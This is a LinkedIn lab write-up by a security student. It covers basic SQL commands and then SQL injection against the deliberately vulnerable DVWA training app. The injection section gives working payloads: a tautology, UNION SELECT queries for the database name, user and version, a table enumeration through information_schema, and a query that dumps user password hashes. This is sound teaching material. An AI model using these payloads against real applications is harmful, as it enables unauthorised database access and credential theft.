SQL Injection Lab
Graphicsstudio 5

SQL Injection Lab

Octavious W. Octavious W.

Octavious W.

Incident Response | Digital Forensics | Vulnerability Analysis | Security+ | CHFI | CEH | Cisco Certified CyberOps Associate | GFACT | GSEC (2025) | GCIH (2025)

发布日期: 2023年12月16日
+ 关注

TOPICS:

Basic SQL Commands

Querying a database with SQL

Deleting data with SQL

SQL Injection Techniques

Basic SQL Commands

  • Show available databases.

Command:

show databases;


  • Create a new database called test.

Command:

create database test;


  • Choose the test database to work with.

Command:

use test;


  • Create tables in the database and define the columns. The commands will include the column names, the types of data for each column, and the max length allowed for each value.

Commands:

create table users (name varchar (30), account integer, balance decimal (10,2));

create table personal (name varchar(30), address varchar(30), city varchar(20), telephone bigint);


  • Display the tables within the test database.

Command:

show tables;

  • Populate the users and personal tables with records. The commands will include the values for each column in the table.

Commands:

insert into users values (‘John’, 123, 10.00);

insert into users values (‘Joe’, 456, 20.00);

insert into personal values (‘John’, ‘1313 Mockingbird Lane’, ‘Mockingbird Heights’, 3105552368);

insert into personal values(‘Joe’, ‘1313 Cemetery Lane’, ‘Greenbrier’, 1313131313);


  • Display all the data in each table.

Commands:

select * from users;

select * from personal;

Querying a database with SQL

  • In the test database created earlier, write a query to retrieve the users and their balance from the users table.

Command:

select name, balance from users;


  • Write a query to retrieve the names and telephone numbers from the personal table.

Command:

select name, telephone from personal;


  • Write a join query to retrieve the users’ names, balances, and telephone numbers from both tables. The name column is the foreign key.

Command:

select users.name, users.balance, personal.telephone from users join personal where users.name=personal.name;

领英推荐

Deleting data with SQL

  • Delete a record from the personal table.

Command:

delete from personal where name=’Joe’;


  • Remove the personal table from the database.

Command:

drop table personal;


  • Delete the whole test database.

Command:

drop database test;

SQL Injection Techniques

We ran a series of queries from the User ID field on login portal of the Damn Vulnerable Web Application.


  • Use a true statement to test if the app is vulnerable to SQL injection.

Command:

1=1

  • The following query has been executed by the target database:

select first_name, surname from “some table” where user_id=1


  • Display all false/empty records and all true/not empty records.

Command:

1’ or ‘0’=’0

  • The following query has been executed by the target database to dump the users:

select first_name, surname from “some table” where user_id = 1’ or ‘0’=’0’;


  • Query for database info and database user info.

Command:

1’ or 1=1 union select database(), user()#

  • Query for the database version.

Command:

1’ or 1=1 union select null,version()#

  • Identify the tables in the target database.

Command:

1’ or 1=1 union select null, table_name from information_schema.tables#

We found a users table.

  • See if any password fields are associated with the users table.

Command:

1’ or 1=1 union select user, password from users#

We can see that the query returned some password hashes.







要查看或添加评论,请登录

Octavious W.的更多文章

  • Internet Browser Forensics with Autopsy
    2024年5月17日

    Internet Browser Forensics with Autopsy

    In this lab we learned how to access web browser history from Windows computers and how to use that data in an…

  • Web Hacking Lab
    2023年11月22日

    Web Hacking Lab

    TOPICS Web Application Vulnerability Scanning With Nikto Burp Suite setup Using Burp Suite to build a site map Brute…

    3 条评论
  • Metasploit Review Lab
    2023年11月17日

    Metasploit Review Lab

    TOPICS: Getting Familiar with Metasploit Vulnerability Scanning with WMAP Configuring Exploits and Payloads Getting…

    5 条评论
  • System Hardening
    2023年10月20日

    System Hardening

    System hardening is the process of making changes to a system or application to make it more secure than it’s default…

    2 条评论
  • I went to Bsides Atlanta!
    2023年10月15日

    I went to Bsides Atlanta!

    I had an amazing experience at BSides Atlanta 2023! Here are my highlights and takeaways of the day! My morning started…

    5 条评论
  • Reconnaissance
    2023年10月12日

    Reconnaissance

    What is Reconnaissance? Reconnaissance is the process hackers use to gather as much information as possible about their…

    7 条评论
  • Logging for Cyber Security
    2023年10月2日

    Logging for Cyber Security

    Here are some notes I took on Logging during my Security+ exam prep. Logs form detailed lists of activities related to…

    6 条评论
  • TryHackMe - New Hire Old Artifacts - Notes
    2023年4月6日

    TryHackMe - New Hire Old Artifacts - Notes

    Scenario Notes: Widget LLC has some concerns with the endpoints in the Finance Dept. Especially an endpoint for a…

  • TryHackMe KAPE Hands-on Challenge
    2023年2月19日

    TryHackMe KAPE Hands-on Challenge

    We will use the forensics tool KAPE to collect and process files from a device Scenario Notes: Organization X’s…

    1 条评论
  • TryHackMe - Windows Forensics 1 - Hands-on Challenge
    2023年2月9日

    TryHackMe - Windows Forensics 1 - Hands-on Challenge

    We will identify where the different files for the relevant registry hives are located and load them into Registry…

    2 条评论

社区洞察

其他会员也浏览了